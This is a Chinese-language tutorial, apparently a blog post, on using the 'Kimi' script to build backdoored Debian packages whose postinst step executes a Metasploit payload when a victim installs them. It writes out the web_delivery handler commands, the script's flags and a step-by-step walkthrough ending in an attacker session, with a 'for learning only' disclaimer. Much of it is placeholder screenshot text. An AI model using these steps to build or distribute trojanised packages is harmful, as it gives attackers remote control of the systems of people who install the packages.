视频演示:

简介

1
2
3
4
5
6
7
8
9
10
Kimi的名字灵感来源于“Kimimaro”,是动画片“火影忍者”的动画片之一。
Kimi是一个为metasploit生成恶意debian软件包的脚本
它由bash文件组成。 bash文件被部署到“/usr/local /bin/”目录中。
当受害者尝试安装deb包由于postinst文件时,后门被执行
Bash文件注入,也像一些受害者执行时的系统命令
攻击者与会话点击。
- 完全独立 意味着用户不需要安装任何debian包创建者
- 可以与任何有效载荷发生器集成,
Kimi基本上取决于web_delivery模块,每件事情都是自动化的。
所有的攻击者需要做以下设置:

enter description here

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit

github: https://github.com/ChaitanyaHaritash/kimi

声明:本文内容仅供交流学习使用,一切由使用者造成的法律问题,均由使用者自行承担!本站及作者概不负责!

制作这种过程也是很简单,先来简单的看下帮助参数
  -h, --help         列举一些帮助参数
  -n NAME,  -n  参数 后面需要跟上Deb包的名称
  -l LHOST, --lhost (-l 参数 后面需要跟上本机的IP	地址)
                        LHOST, for Handler
  -V VERS,  (-V 参数跟上随意指定版本信息以区分之前的包)
  -a ARCH, --arch ARCH  Architecture (i386/amd64) (-a 参数 需指定平台架构 如i386/amd64)

使用

那么我们来简单看下需要用的参数:
 
enter description here
 

1.首先需要一个Deb 包:我这里随便弄了个包 之前有在 http://www.ggsec.cn/Debinject.html 用到过。
我这里重命名为f。便于写。enter description here
那么-n 的参数跟上 f (以包名称为准)

2.填上ip地址 -l 192.168.1.103
 
enter description here
 

3.添加平台架构 -a amd64 (我这里是64位的 所以填写amd64,根据目标机情况填写 )
enter description here

4.添加版本-V 参数跟上随意指定版本信息以区分之前的包 enter description here

生成并解压,得到会话

 
enter description here
 
生成了backdoorenter description here
 
enter description here
 

在此期间会开启虚拟终端(xterm)
 
enter description here
enter description here
 
enter description here
 
这个是xterm
enter description here

解压backdoor
enter description here

并且得到会话
 
enter description here